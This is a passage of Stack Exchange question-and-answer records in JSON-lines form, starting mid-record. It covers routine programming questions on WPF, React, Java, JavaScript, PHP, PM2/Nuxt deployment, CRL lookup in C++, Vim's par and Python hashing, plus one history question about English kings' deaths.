message:\n\n'System.Windows.Data.BindingExpression'\n value cannot be assigned to property\n 'Contenu' of object\n 'View.UserControls.ShadowedText'.\n Value cannot be null. Parameter name:\n textToFormat Error at object\n 'System.Windows.Data.Binding' in\n markup file\n 'View.UserControls;component\/saletotal.xaml'\n Line 363 Position 95.\n\nThe binding is pretty standard:\n<code><my:ShadowedText Contenu=\"{Binding Path=Total,\n Converter={StaticResource CurrencyToStringConverter},\n NotifyOnTargetUpdated=True}\"\n TargetUpdated=\"MontantTotal_TargetUpdated\">\n<\/my:ShadowedText>\n<\/code>\n(Styling properties removed for conciseness)\nThe converter exists in the resources and works correctly when NotifyOnTargetUpdated=True is removed. Similarly, the TargetUpdated event is called and implemented correctly, and works when the converter is removed.\nNote: This binding is defined in a ControlTemplate, though I don't think that is relevant to the problem.\nCan anybody explain me what is happening ? Am I defining the binding wrong ? 
Are those features mutually exclusive (and in this case, can you explain why it is so) ?\nThanks in advance.\nMore info: Here is the content of the TargetUpdated handler:\n<code>private void MontantTotal_TargetUpdated(object sender, DataTransferEventArgs e)\n{\n ShadowedText textBlock = (ShadowedText)e.TargetObject;\n double textSize = textBlock.Taille;\n double delta = 5;\n double defaultTaille = 56;\n double maxWidth = textBlock.MaxWidth;\n while (true)\n {\n FormattedText newFormat = new FormattedText(textBlock.Contenu,\n CultureInfo.CurrentCulture, FlowDirection.LeftToRight,\n new Typeface(\"Calibri\"), textSize,\n (SolidColorBrush) Resources[\"RougeVif\"]);\n if (newFormat.Width < textBlock.MaxWidth && textSize <= defaultTaille)\n {\n if ((Math.Round(newFormat.Width) + delta) >= maxWidth || textSize == defaultTaille)\n {\n break;\n }\n textSize++;\n }\n else\n {\n if ((Math.Round(newFormat.Width) - delta) <= maxWidth && textSize <= defaultTaille)\n {\n break;\n }\n textSize--;\n }\n }\n\n textBlock.Taille = textSize;\n}\n<\/code>\nThe role of the handler is to resize the control based on the length of the content. It is quite ugly but I want to have the functional part working before refactoring.\nComment: are you doing anything special in the TargetUpdated event handler ?\nComment: I don't know if it's just a typo but you are missing a comma in the binding. It should look like this: {Binding Path=Total, Converter={StaticResource CurrencyToStringConverter}, NotifyOnTargetUpdated=True}\nComment: It is a typo, I added line breaks in the question for readability, there is a coma between the Converter and the NotifyOnTargetUpdated parts in the real source code. Editing the question to fix this.\nComment: I added the code of the handler in the question. While it is overcomplicated, I don't think it does anything that might break the binding.\nAnswer: If you're getting a XamlParseException that means this error is happening during the initialization of this control. \nWith <code>NotifyOnTargetUpdated=True<\/code> specified, the TargetUpdated event is being raised inside your InitializeComponent call. At this point, it's incredibly doubtful you have a DataContext, so the binding will evaluate to null. Normally, there's no problem, but you are requesting an event be raised when the property is updated.\nSo it's hitting your event handler with a null <code>textBlock.Contenu<\/code> value, you're passing it into the first parameter of FormattedText (which is named <code>textToFormat<\/code>) and it is throwing an ArgumentNullException.\nPractice some defensive programming and check your <code>textBlock.Contenu<\/code> value for null before running your code.\nTwo tips for future reference:\n1) When receiving an exception, paste the entire stack trace, including InnerException (so call Exception.ToString). More often than not, you will see where it's happening. If not, someone on here will see where it's happening much quicker than you got your answer.\n2) When receiving an exception, and you don't know where it's being thrown from (and you clearly don't, or you'd have seen it's in your code), force Visual Studio to break on all exceptions.\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/d14azbfh(VS.80).aspx\n(Note that depending on your settings, the menu item they reference may or may not be there. You can also use CTRL+ALT+E to open the Exceptions dialog.)\nWith this set, the debugger will stop on the exact line of code throwing the Exception. \nComment: Thank you, that was exactly the problem. 
I wasn't expecting at all to be called during the Initialization of the control.\n","meta":{"source":"stackoverflow","title":"WPF Converter and NotifyOnTargetUpdated exclusive in a binding?","dup_signals":{}},"subset":"stackexchange"} +{"text":"TypeError: .some Is not A Function React JS Error\n\nQuestion: <code>const [userFavorites, setUserFavorites]= useState([]);<\/code> This is the part of my code that sets the state of userFavorites to an array and I have a function somewhere else that tries to do <code>userFavorites.some<\/code> and I keep <code>TypeError: userFavorites.some is not a function<\/code>. I appreciate any help!\nComment: if you console.log userFavorites what does it return. It seems that it might not be an array\nComment: Please show more of your code. ANything that can change userFavorites especially\nAnswer: If you can post the entire code snippet then it will be helpful to answer. Though you're possibly doing something like this.\nInitially, it is declared as an empty array <code>[]<\/code>, But there is a possibility that somewhere in your code you're setting the state like this.\n<code> setUserFavorites(someDataFromAPICallORPostOperation).\n<\/code>\nHere, Your <code>someDataFromAPICallORPostOperation<\/code> is possibly undefined.\nYou can solve this in two ways.\n1. Default to an empty array while setting the state.\n<code> setUserFavorites(someDataFromAPICallORPostOperation ?? []).\n<\/code>\n2. Check for the <code>undefined<\/code> before calling the <code>.some<\/code> function.\n<code>userFavorites?.some(function) \/\/ Using optional chaining\n<\/code>\nor\n<code>userFavorites && userFavorites.some(function)\n<\/code>\nEDIT - Based on the code mentioned in the commented link.\nThe array push operation doesn't return the updated array, Instead, it returns the number of elements in the updated array.\nThis can be solved as\n<code> function addFavoritesHandler(favoriteMeetup) {\n setUserFavorites(prevUserFavorites => {\n return [...prevUserFavorites, favoriteMeetup];\n });\n }\n<\/code>\nExplanation, Earlier you were doing something like this.\n<code> function addFavoritesHandler(favoriteMeetup) {\n setUserFavorites(prevUserFavorites => {\n return prevUserFavorites.push(favoriteMeetup);\n });\n }\n<\/code>\nHere you will set the state to a number instead of an array as <code>push<\/code> will return the number of elements in that array. Hence, while doing <code>userFavorites.some<\/code> it throws an error as you are setting the <code>userFavorites<\/code> to a number instead of an array.\nComment: https:\/\/pastebin.com\/rLHT3i9V That is the code for the js file creating the userFavorites and the js file using the other js file.\nComment: @Airlo I have updated the answer. See the `Edit` part at the end of this answer.\n","meta":{"source":"stackoverflow","title":"TypeError: .some Is not A Function React JS Error","dup_signals":{}},"subset":"stackexchange"} +{"text":"What English king died from water intoxication?\n\nQuestion: I vaguely remember reading a story about an English king that died from drinking too much water after a hunt. I'm sorry to say that all parts of this story may be untrue\u2026I'm not sure whether it was a king or other royalty, whether it was England or somewhere else, or whether it was actually after returning from a hunt or some other event. I also don't remember the source of the story.\nDespite all the uncertainty: does someone recognise this story? 
Did it actually happen, or is it a historical urban myth?\nAnswer: Henry I, the 3rd norman King of England, died after eating a surfeit of lampreys after going on a hunting trip while ill. Apparently eating them was against the advice of his physician. Lampreys were pretty common fare in Early Medieval Britain but are pretty gross eel-like fish that still happily inhabit English rivers today. It is likely that they weren't properly cooked, and may have been contaminated with water from the river they were fished from. England rivers were littered with weirs and eel traps, and there were several Doomes demanding Weir clearance around the country in the 10th and 11th centuries (Law of Aethelred II) as they blocked the flow of the river, but rivers remained pretty clogged anyway and likely didn't dilute\/run off the sewage and waste all that well! \nJohn I 'Lackland' probably died of dysentery brought on by eating rotten peaches and drinking wine during a military campaign.\nEdward IV died after catching a chill after a fishing trip. Some have hypothesized that he died of a stroke.\nAll of this information is on Wiki. Use this as a starting point to find better sources. I would wager, Henry I best matches your question.\nComment: +1 just for introducing me to the word `weir`. We call the non-fishing variety a \"low water dam\" here in The States. I wonder why we abandoned\/lost the original word...\nComment: @T.E.D.: FWIW, in German it's \"Wehr\", with the verb \"wehren\" having the meanings \"to defend, to resist, to dam\". (Yes, that's where \"Wehrmacht\" came from, literally \"defense force\".) Funny thing how the English word only has that one meaning...\nComment: probably just trying to spell it :p I went through wear, weer, wehr, wier to get to my document...\nComment: \"*weirs*\" are \"*weird*\" is one way to remember the spelling.\nComment: @DevSolar - I will admit to having seen the word before, in Anne McCafferey [Pern novels](https:\/\/en.wikipedia.org\/wiki\/Pern), but I originally thought she just made the word up. After this answer, it made a bit more sense, but I was thinking it was a bit weird to compare Dragon homes to fish hatcheries (although they did hatch dragon eggs in them). Your comment makes her usage of that word make much more sense, if that's what she meant by it.\nComment: Thanks. I found the Wiki earlier,and also thought the Henry I was the best match.\nAnswer: King Louis X of France died young in 1316 after a tennis match, I think. Possibly drinking something was connected with it.\nKing Edward VI of England died as a boy after a long and painful illness. It doesn't make medical sense today but I think I remember someone at the time blaming it on drinking water that was too cold.\nI suggest that you might try researching the deaths of Louis X and Edward VI for anything about drinking water being the cause.\nComment: Sources would improve this answer.\nAnswer: Perhaps you are thinking of William the Conqueror. \nThe account of William's death from William of Malmesbury in his 12th century Gesta Regum Anglorum reads as follows in translation:\n\nAt last he set fire to the city of Mantes, where the church of St.\n Mary was burnt, together with a recluse who did not think it\n justifiable to quit her cell even under such an emergency; and the\n whole property of the citizens was destroyed. 
Exhilarated by this\n success, while furiously commanding his people to add fuel to the\n conflagration, he approached too near the flames, and contracted a\n disorder from the violence of the fire and the intenseness of the\n autumnal heat. Some say, that his horse leaping over a dangerous\n ditch, ruptured his rider, where his belly projected over the front of\n the saddle. Injured by this accident, he sounded a retreat, and\n returning to Rouen, as the malady increased he took to his bed. His\n physicians, when consulted, affirmed, from an inspection of his\n urine, that death was inevitable.\n","meta":{"source":"history.stackexchange","title":"What English king died from water intoxication?","dup_signals":{}},"subset":"stackexchange"} +{"text":"JAVA class array\n\nQuestion: I am trying to write to code to list all the objects in the class. (Which is working) but I want to get the code to check if there are objects if the player is empty and print out a message to screen if it is. But I cant get it to work. Can anyone assist me please ? \nClass\n<code> public void listAll() \n {\n for (Song a : songs) {\n if(songs.isEmpty()) \/\/cant get this to check if there are songs on the player.\n {\n System.out.print(\"There are no songs on the playlist\");\n }\n else{\n System.out.print(a);\n }\n }\n }\n<\/code>\nTester \n<code> keyIn.nextLine(); \/\/clear the buffer of the previous option\n System.out.print(\"On player are\");\n player.listAll();\n break;\n<\/code>\nComment: No need to check that condition as you are using `enhanced for loop`. Loop willl automatically terminate when the next element in array is null.\nComment: did you try debugging it ?\nComment: Did you manage to get it working?\nComment: Yes I did thank you very much\nAnswer: You are trying to loop through an empty list, so the looped code doesn't happen at all. If you check whether the list is empty outside of the loop, then you get the result you wanted.\n<code>public void listAll() {\n if (songs.isEmpty()) \/\/ cant get this to check if there are songs on the\n {\n System.out.print(\"There are no songs on the playlist\");\n } else {\n for (Song a : songs) {\n System.out.print(a);\n }\n }\n\n}\n<\/code>\nAnswer: If <code>songs<\/code> is empty, the loop won't be entered. 
You need to check outside the loop :\n<code>public void listAll() {\n if(songs.isEmpty()) {\n System.out.println(\"There are no songs on the playlist\");\n } else {\n for (Song a : songs) {\n System.out.println(a);\n }\n }\n}\n<\/code>\nAnswer: You need to check the condition <code>if(songs.isEmpty())<\/code> outside the <code>for<\/code> loop because if the <code>list<\/code> is <code>empty<\/code>, the execution does not go inside the <code>for loop<\/code>, so your <code>if<\/code> condition statement will not get executed at all.\n<code>public void listAll() \n {\n \/\/Check this first\n if(songs.isEmpty())\n {\n System.out.print(\"There are no songs on the playlist\");\n return;\/\/It is even more better to return from here itself\n }\n\n \/\/NOW, use for loop\n \/\/if songs size is zero, execution does not go inside the for loop\n for (Song a : songs) {\n System.out.print(a);\n }\n }\n<\/code>\nIt is even better, if you can use the <code>return<\/code> statement to go back to the caller (immediately) from the method (like above), which will indicate that there is no need to process the subsequent lines of code in the method.\nComment: Thank you very much that worked a treat and now can do it for some of the other parts I need :-)\n","meta":{"source":"stackoverflow","title":"JAVA class array","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is the best practice of using if condition in JavaScript?\n\nQuestion: \n\n<code>var foo = \"bar\";\nif (foo) {\n console.log(foo);\n}\n\nvar foo = \"bar\";\nif (!!foo) {\n console.log(foo);\n}<\/code>\n\nWhich one should I use? \nPerformance wise both ways look same. \nhttps:\/\/jsperf.com\/ifconditioncheck\nAnswer: The first. The second one doesn't read well and I can't see an obvious use for it.\nComment: Unless micro-optimizations are a must, readable code is the way to go\nAnswer: \n<code>!!<\/code> is not not\n\nInside the if() both are valid, 2nd one just force it to become a bool value but really not needed. So just go with <code>if (foo)<\/code>\nbut if you want to do assign another variable there is a difference. See example below:\n\n<code>var foo = \"bar\";\n\nvar myvar = foo;\nvar myvar2 = !!foo;\n\nconsole.log(\"myvar-->\" + myvar);\nconsole.log(\"myvar2-->\" + myvar2);<\/code>\n\nRead more about JS truthy-falsey: https:\/\/j11y.io\/javascript\/truthy-falsey\/\nAnswer: You add a condition in the second block with !!foo, it would require more time.\nBasically, if you run thousands of time with boucle the same if, you will see that the first one has the best performance\nexample:\n<code>var foo = \"bar\"; \nvar n = new Date().getMilliseconds();\nfor (i=0;i<5;i++){\n if (foo) {console.log(foo);}\n}\nvar n2 = new Date().getMilliseconds();\nvar elasped_time = n2-n;\nconsole.log(elasped_time);\n<\/code>\nAnswer: If you just want to check the availability of a value in string foo use \n<code>var foo = \"bar\";\nif (foo) {\n\n}\n<\/code>\nBut this is not the best way to check for a empty string .\n","meta":{"source":"stackoverflow","title":"What is the best practice of using if condition in JavaScript?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I make an array of all lists length x of the numbers 0 and 1?\n\nQuestion: I need to create an array like this: \n<code>$array = array(array(1,1,1,0,0,0,1,1), array(1,1,1,1,0,0,1,0));\n<\/code>\nbut with all combinations of 1 and 0.\nI wish to do this automatically, so I was thinking a for loop would be the best idea. 
\nIn other words the inner arrays should be all combos like 0,0,0,0,0,0,0,0 then 0,0,0,0,0,0,0,1 then 0,0,0,0,0,0,1,0 then 0,0,0,0,0,0,1,1. for all combos.\nI started like this:\n<code>$array = array();\nfor($i =0;$i<100; $i++){\n$array[$i] = 0;\n}\n<\/code>\nHow do I get this to do what I am trying to do?\nComment: It looks exactly like a list of binary numbers... did you notice that?\nComment: yess i actually did, but not sure how to get all binary numbers\nAnswer: Use <code>decbin<\/code> to convert your counter to binary.\n<code>str_pad<\/code> allows you to pad strings, in this case I'm 0-padding it to a length of 8 bits.\n<code>$array = array();\nfor($i =0;$i<100; $i++){\n $array[$i] = str_pad(decbin($i), 8, \"0\", STR_PAD_LEFT);;\n}\nvar_dump($array);\n<\/code>\nDemo\nAnswer: This will print out an array of all binary variations from <code>00000000<\/code> to <code>11111111<\/code> where each one is in it's own array of chars.\n<code>$array = array();\n\nfor ($i = 0; $i < 256;)\n{\n $array[] = str_split(sprintf('%08d', decbin($i++)));\n}\nprint_r($array);\n<\/code>\nSee example\nComment: +1 for this one - I think an \"array of arrays\" is what the OP asked for. Really like the compact use of `decbin`, `sprintf(\"%08d\"`, and `str_split` - masterful!\n","meta":{"source":"stackoverflow","title":"How can I make an array of all lists length x of the numbers 0 and 1?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Running multiple apps with PM2 from same repo\n\nQuestion: Some context:\n\nI have a single repo (nuxt application) that is used to deploy to multiple apps\/domains\nall apps are on the same server\neach app is in a separate folder with a clone of the repo, each folder is served on it's own domain (nginx)\neach app has a different env file, the most important difference is a domain id (eg: <code>DOMAIN_ID=1<\/code> etc..)\nbefore build, I have a node script that does some setup work based on this <code>DOMAIN_ID<\/code>\n\nI would like to use PM2 to:\n\nuse a single dir with the repo for all my domains\nupon running pm2 deploy production I would like to be able to deploy all the domains, each domain should run it's setup script before doing the build\neach domain should build in a subfolder so I can configure nginx to serve the app for a specific domain from it's folder\n\nI tried to create an ecosystem file like so:\n<code>module.exports = {\n apps: [\n {\n name: 'Demo1',\n exec_mode: 'cluster',\n instances: 'max',\n script: '.\/node_modules\/nuxt\/bin\/nuxt.js',\n args: 'start',\n env: {\n DOMAIN_ID: 1,\n },\n },\n {\n name: 'Demo2',\n exec_mode: 'cluster',\n instances: 'max',\n script: '.\/node_modules\/nuxt\/bin\/nuxt.js',\n args: 'start',\n env: {\n DOMAIN_ID: 2,\n },\n },\n ],\n deploy: {\n production: {\n host: 'localhost',\n user: 'root',\n ref: 'origin\/master',\n repo: 'my_repo',\n path: 'path_to_repo',\n 'post-setup': 'npm install && node setup.js',\n 'post-deploy': 'npm run build:setup && pm2 startOrRestart ecosystem.config.js --env production',\n },\n },\n}\n<\/code>\nbut it doesn't seem to work.\nWith the above ecosystem file the processes are created but when I access the domain for Demo1, pm2 serves randomly from Demo1 or Demo2 process.\nThere should be 2 dist folders somewhere, one for each of the apps.\nI'm wondering if the above config is good and I'm just having an nginx issue or pm2 can't actually handle my use case.\nComment: Are these apps static or SSR?\nComment: Hi Nick. 
The apps are SSR.\nComment: Hey Catalin, I have prepared an answer but I'm not sure it solves your issue as you haven't really stated exactly what it is that isn't working. Can you update your question with just a little more detail? What you're aiming to achieve is pretty clear, but then you simply state \"but it doesn't seem to work\".\nComment: Thanks Nick. I tried to put more relevant info in the question. Sorry but I don't know nginx (somebody else is working on that part). Not sure if what I'm trying to achieve can be done with pm2.\nComment: I posted an answer, which should help point you in the right direction. If you need help bending things to your exact use case, just leave a comment and I'll see if I can help. Other might be able to help where I can't.\nAnswer: To achieve what you're after, you'll need the following for each app:\n\nA directory to serve your production build files from.\nA node server instance, running on a unique port (eg. 3000, 3001).\nA suitable nginx virtual host configuration for each app.\n\nFirst, the build directories. The <code>nuxt build<\/code> script will look for a <code>.nuxt.config.js<\/code> and <code>.env<\/code> file in the srcDir (project root by default), produce the production build files for your app based on these files, and store the output at <code>\/.nuxt<\/code> (again, by default). Passing the <code>--config-file<\/code> and <code>--dotenv<\/code> arguments to the <code>nuxt build<\/code> command allows you to point to different config and env files, thus enabling you to produce separate builds from a single repo.\nEg:\n<code>-- appRoot (the default srcDir, we'll change this in nuxt.config.js)\n |__ node_modules\n |__ package.json\n |__ ...etc\n |__ src\n |__ commons\n | |__ (shared configs, plugins, components, etc)\n |__ app1\n | |__ nuxt.config.js\n | |__ ecosystem.config.js\n | |__ .env\n |__ app2\n |__ nuxt.config.js\n |__ ecosystem.config.js\n |__ .env\n<\/code>\nFor convenience, you could create the following scripts in <code>package.json<\/code>. To produce a build for app1, you run <code>npm run app1:build<\/code>.\n<code>\"scripts\": {\n ...\n \"app1:build\": \"nuxt build --config-file src\/app1\/nuxt.config.js --dotenv src\/app1\/.env\",\n \"app2:build\": \"nuxt build --config-file src\/app2\/nuxt.config.js --dotenv src\/app2\/.env\",\n ...\n}\n<\/code>\nNow we're pointing our build scripts to individual app's <code>nuxt.config.js<\/code> files, we need to update those files and specify a srcDir and buildDir. The <code>buildDir<\/code> is where the output from each build command will be stored.\n<code>nuxt.config.js\n...\n srcDir: __dirname,\n buildDir: '.nuxt\/app1' (this path is relative to the project root)\n...\n<\/code>\nThat's it for building. For serving...\nEach app needs a unique production server instance, running on it's own unique port. By default, <code>nuxt start<\/code> will launch a server listening on port 3000 and based on the <code>nuxt.config.js<\/code> file at the root of the project. 
As with the build command, we can pass arguments to change the default behaviour.\nYou could add the commands to package.json:\n<code>\"scripts\": {\n ...\n \"app1:build\": \"nuxt build --config-file src\/app1\/nuxt.config.js --dotenv src\/app1\/.env\",\n \"app1:start\": \"nuxt start --config-file src\/app1\/nuxt.config.js --dotenv src\/app1\/.env -p=3000\",\n \"app2:build\": \"nuxt build --config-file src\/app2\/nuxt.config.js --dotenv src\/app2\/.env\",\n \"app2:start\": \"nuxt start --config-file src\/app2\/nuxt.config.js --dotenv src\/app2\/.env -p=3001\",\n ...\n}\n<\/code>\nBy telling <code>nuxt start<\/code> to use app specific <code>nuxt.config.js<\/code>s, and having those point to unique <code>buildDir<\/code>s, we're telling our servers which directories to serve from for each app.\nImportant\nMake sure when starting a production server you specify unique port numbers. Either add it to the start command (as above) or inside the <code>nuxt.config.js<\/code> file of each app.\nNow you have unique builds, and unique server instances, you need to configure nginx to serve the correct app for each domain (I'm assuming you either know how to configure nginx to support virtual hosts, or someone on your team is handling it for you). Here's a stripped down config example:\n<code>server {\n ...\n server_name app1.com;\n root \/path\/to\/appRoot;\n ...\n location \/ {\n ...\n proxy_pass http:\/\/localhost:3000;\n ...\n }\n ...\n}\n<\/code>\nEach app's nginx config can point to the same root- it's the proxy_pass that routes the request to the correct node server, which in turn knows which app to serve as we passed the appropriate arguments in with our <code>nuxt start<\/code> command.\nPM2\nI use PM2 to manage the node server instances, so a deployment script for the given example might look like:\nHandle your version control\/env files, and then...\n<code>cd \/appRoot\nnpm install\nnpm run app1:build\npm2 reload src\/app1\/ecosystem.config.js\n<\/code>\nWith app1's <code>ecosystem.config.js<\/code> files setup as so:\n<code>module.exports = {\n apps: [\n {\n name: \"app1\",\n exec_mode: \"cluster\",\n instances: \"max\",\n script: \".\/node_modules\/nuxt\/bin\/nuxt.js\",\n args: \"start --config-file src\/app1\/nuxt.config.js --dotenv src\/app1\/.env -p=3000\"\n }\n ]\n}\n<\/code>\nMight need some tweaking to suit your needs, but I hope this helps!\n","meta":{"source":"stackoverflow","title":"Running multiple apps with PM2 from same repo","dup_signals":{}},"subset":"stackexchange"} +{"text":"Finding CRL distribution point URL from certificate using visual c++\n\nQuestion: I have to find CRL distribution point URL from a certificate. I managed to get obtain context (CERT_CONTEXT) of a certificate. \nFrom this, how do I find CRL URL? To obtain publickeylength, there was a function CertGetPublicKeyLength. Similary is there anyway to find CRL Distribution point?\nAnswer: Yes, I found the answer! 
You can use CryptGetObjectUrl() to obtain it.I would like to post the snippet of the code as it will be surely of some help to someone.\n<code>DWORD pcbUrlArray,pcbUrlInfo;\nif(CryptGetObjectUrl(URL_OID_CERTIFICATE_CRL_DIST_POINT,pCert,CRYPT_GET_URL_FROM_PROPERTY | CRYPT_GET_URL_FROM_EXTENSION,NULL,&pcbUrlArray,NULL,&pcbUrlInfo,0))\n{\n PCRYPT_URL_ARRAY urlArray = (PCRYPT_URL_ARRAY)malloc(pcbUrlArray * sizeof(CRYPT_URL_ARRAY));\n PCRYPT_URL_INFO urlInfo = (PCRYPT_URL_INFO)malloc(pcbUrlInfo * sizeof(CRYPT_URL_INFO));\n\n if(CryptGetObjectUrl(URL_OID_CERTIFICATE_CRL_DIST_POINT,pCert,CRYPT_GET_URL_FROM_PROPERTY | CRYPT_GET_URL_FROM_EXTENSION,urlArray,&pcbUrlArray,urlInfo,&pcbUrlInfo,0))\n {\n for(int i=0;i<urlArray->cUrl;i++)\n wcout<<urlArray->rgwszUrl[i]<<endl;\n }\n}\n<\/code>\nBasically you get the pCert (CERT_CONTEXT) through\n<code>WinHttpQueryOption( hRequest,WINHTTP_OPTION_SERVER_CERT_CONTEXT,&pCert,&dwLen);\n<\/code>\nComment: Thank you for the code snippet but I think you have a bug there: CryptGetObjectUrl returns size in bytes, not in objects so malloc allocates way too much memory\n","meta":{"source":"stackoverflow","title":"Finding CRL distribution point URL from certificate using visual c++","dup_signals":{}},"subset":"stackexchange"} +{"text":"HTML text-field value with 'special characters'\n\nQuestion: Probably this is a known problem and there is a specific best practice.\nI have to fill a text field value with received text from backend.\nI this text contains some 'special characters' (for example \" <) I have some issued during the rendering of the page.\nHow can I solve this?\nCan I solve this issue front-end side?\nI can use only javascript front-end side. I not use PHP;\nI use this html code:\n<code><input class=\"myclass\" value=\"<%= text_from-backend %>\" placeholder=\"My Placeholder\"\/>\n<\/code>\nComment: This is impossible to answer unless you specify what the \"some issues\" are that you have and what templating system that is. A [mcve] please.\nComment: probably what you are looking for are html entities like `>` which, if you put it into your html, will be rendered as `>`, but the question is not specific indeed\nAnswer: You can replace special characters in PHP:\n<code><input class=\"myclass\" value=\"preg_replace('\/[^ a-z\\d]\/ui','','<%= text_from-backend %>');\" placeholder=\"My Placeholder\"\/>\n<\/code>\n","meta":{"source":"stackoverflow","title":"HTML text-field value with 'special characters'","dup_signals":{}},"subset":"stackexchange"} +{"text":"Vim Formatprg PAR to justify comments with Date Stamp\n\nQuestion: I am using PAR paragraph reformatter. It is an incredible tool to be used with Vim. I am having a situation where, I have a comment that has date, developer initials and the comment message. I want to align (justified) it using Par, so that it maintains the indentation for date and initials. Is that possible?\nHere is what I have:\n\nHere is what it does when I try:\n\nset formatprg=par\\ r80j\n\nDesired result:\n\nThank you. \nComment: Please, don't use screen shots when you can copy and paste the text. Also, would avoid us having to re-type to play with it.\nComment: Sorry. It makes sense...I will add as a text from now on so that its easy to try it out.\nComment: No problem. Use the code mode or check the editing faq. Thanks! Best wishes\nAnswer: I don't recommend setting this as the standard formatting program\noptions, unless this is your standard way of writing any text. 
So here\nis a filter version, better for single uses:\n<code>:%!par 80p25dhj\n<\/code>\nI'm assuming you want a 80 final width and justified text. Remove <code>j<\/code> or\nchange <code>80<\/code> if needed. Also, the width of the prefix is a guess. Please\ncheck it:\n<code>; 2012\/12\/12 AB Lorem ipsum ....\n^ ^\n|-------------------| This width in the original text\n<\/code>\nI guessed 25 but use a correct number.\nComment: @SatoKatsura lol Yes, and it really needs the rewrite. Interesting that this program was first written in the year I was born, and since then not to have a proper documentation is thus a life-time wait :-D Anyway, I think it even says this, but the manual is really a explanation of how it works, not its usage. I didn't understand many parts until I opened the code and then \"ah, this is what he means\". The good part is that we can see how a brilliant programmer mind works. The bad part is we may not understand _it at all_ if we don't spend the time to understand _it all_, the whole process.\nComment: **OMG**....This is incredible...This is exactly what I wanted..It works like a charm.... Thank you so much....sidyll\nComment: @Cricrazy Happy that it worked! :-D This utility par is very powerful and complex, so is the manual. I recommend exploring it when you have the time, it is useful in the long run. Also, if the question solves your problem, please mark it as accepted answer to help future viewers here to know. Thanks!\nComment: I'm using par on daily basis. I've been planning to understand WTF all those concepts in par's manual _actually_ mean for maybe 10 years now -- and I'm a mathematician. But you know what, the author has been putting off rewriting of said manual for even longer. Yay for learning by doing -- saves you from _understanding_ what you're doing. :)\n","meta":{"source":"stackoverflow","title":"Vim Formatprg PAR to justify comments with Date Stamp","dup_signals":{}},"subset":"stackexchange"} +{"text":"Generate unique 16 digit alphanumeric based on input number in python\n\nQuestion: How would I generate unique 16 digit alphanumeric based on input number in python. Result should be the same if we run the function multiple times.\nfor example if the input is 100 and the program returns 12345678abcdefgh and next time if the user provides same input it should return the same result 12345678abcdefgh.\nComment: How \"unique\" do you want? Even an md5 hash will give you twice that number of characters. I suppose you could take a slice of that though to get length 16\nAnswer: <code>\"\"\"\ngenerate unique 16 digit alphanumeric based on input number in python. Result\nshould be the same if we run the function multiple times. 
for example if\nthe input is 100 and the program returns 12345678abcdefgh and next time if the\nuser provides same input it should return the same result 12345678abcdefgh.\n\"\"\"\n# Note: This does not use hashlib because hash returns HEX values which \n# are 16 alphanumeric characters: \n# 0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f\n\ndef generate_alphanumeric(number):\n # Convert the number to binary representation\n binary = bin(number)\n # remove 0b from binary representation prefix\n mask_right_side = binary[2:]\n # Create a mask to select 16 characters based on the binary representation.\n # Creating padding 0's for the mask_left_side\n mask_left_side = '0' * (16 - len(mask_right_side)) # Padding characters\n # Create the 16 character mask\n mask = mask_left_side + mask_right_side\n # Create a list of tuples of (zero_code, one_code)\n zeros_codes = '12345678apqdexgh'\n ones_codes = '90ijklmnobcrsfyz'\n codes = list(zip(zeros_codes, ones_codes))\n # Create the alphanumeric output.\n if len(mask) <= 16:\n result = ''\n for index in range(16):\n value = int(mask[index])\n zero_code, one_code = codes[index]\n if value: # mask value is 1\n result += one_code\n else:\n result += zero_code\n return result\n else:\n message = f'The entered values {number:,d} is greater that 65,' \\\n f'535. This is not allowed because the returned 16 ' \\\n f'character alphanumberic text will be a repeat of text ' \\\n f'assigned in the range of 0 to 65,535. This violates the ' \\\n f'requirement for unique text per number.'\n return message\n\n# Testing\nprint(generate_alphanumeric(100))\nprint(generate_alphanumeric(15))\nprint(generate_alphanumeric(0))\nprint(generate_alphanumeric(65_535))\nprint(generate_alphanumeric(65_536))\n<\/code>\nAnswer: You could use the hashlib module to hash the input integer. The generated hash will always be the same if the input is the same.\n<code>import hashlib\n\nprint('Enter a number to hash: ')\n\nto_hash = input()\n \ndigest_32 = hashlib.md5(bytes(int(to_hash))).hexdigest()\n\ndigest_16 = digest_32[0:16]\n\n# output: 6d0bb00954ceb7fbee436bb55a8397a9\nprint(digest_32)\n\n# output: 6d0bb00954ceb7fb\nprint(digest_16)\n<\/code>\n","meta":{"source":"stackoverflow","title":"Generate unique 16 digit alphanumeric based on input number in python","dup_signals":{}},"subset":"stackexchange"} +{"text":"fatfree framework, repopulate fields after unsuccessful validation\n\nQuestion: I have GET route which shows the contact form, and POST route when user submits the form, then in my controller method I do some validation tests on data being submitted.. how would I now send user back to form if data is not valid, with entered data being re-populated in form fields?\nI know I can use <code>isset(@POST.fieldname)<\/code> in my template, but what's the right way of\nsending entered data back to that view, and how to redirect user back to the\nform? Is the <code>f3->reroute<\/code> method right way of doing that?\nAnswer: I think you can take as a rule to include input data inside your form views. 
This way, any form view will be easily reusable with any source of data.\nFor example:\nYour form view:\n<code><form action=\"\" method=\"post\">\n <input type=\"text\" name=\"email\" value=\"{{ @@input.email }}\"\/>\n <input type=\"text\" name=\"message\" value=\"{{ @@input.message }}\"\/>\n <button type=\"submit\">Submit form<\/button>\n<\/form>\n<\/code>\nYour controller class:\n<code>class myController {\n\n function get($f3) {\n $this->renderForm();\n }\n\n function post($f3) {\n $post=$f3->clean($_POST);\n \/\/validate form data here\n if ($form_validated) {\/\/valid form data\n\n } else \/\/invalid form data\n $this->renderForm($post);\n }\n\n protected function renderForm($input=array()) {\n $tpl=Template::instance();\n \/\/variant 1:\n echo $tpl->render('form.html','text\/html',array('input'=>$input))\n \/\/ or variant 2:\n Base::instance()->set('input',$input);\n echo $tpl->render('form.html');\n }\n\n}\n<\/code>\nIn some other contexts, you can feed a form view with data coming from a db mapper (for example when editing an entry from a back-office): <code>$this->renderForm($mapper->cast())<\/code>\nComment: Well I didn't address this point in my example because I thought it was a bit off-topic. I guess it's preferrable to inject the filtered posted data into the view rather than the raw data... although there's no big risk not to do so, since the raw data is not saved in DB at that stage. Anyway, I've just updated the example.\nComment: Just reroute to the `GET` controller. If you need to print a success message, you'll need to store it in `SESSION`. You can implement that yourself or use this [Flash message](https:\/\/github.com\/ikkez\/F3-Sugar\/tree\/master-v3\/Flash) utility.\nComment: Sure, you've got the idea :)\nComment: I suppose this is also better for security, having 